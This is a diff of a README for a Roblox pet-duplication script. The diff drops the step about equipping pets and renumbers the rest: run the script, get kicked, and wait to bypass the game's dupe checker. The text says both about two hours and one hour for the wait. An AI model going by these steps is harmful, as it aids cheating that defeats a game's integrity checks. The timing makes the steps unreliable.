VxidHub/dupe/README.md

 ## Instructions

 1. Join a Roblox game
-2. Equip the pets you want to duplicate
-3. Run the script
+2. Run the script
-4. Wait 1 - 2 minutes
+3. Wait 1 - 2 minutes

 -- You should get kicked here --

-5. Do not rejoin for ~ 2 hours (Bypassing dupe checker)
+4. Do not rejoin for ~ 2 hours (Bypassing dupe checker)

 -- After 1 hour --

-6. Join a Roblox game
+5. Join a Roblox game
-7. Enjoy your duped pets!
+6. Enjoy your duped pets!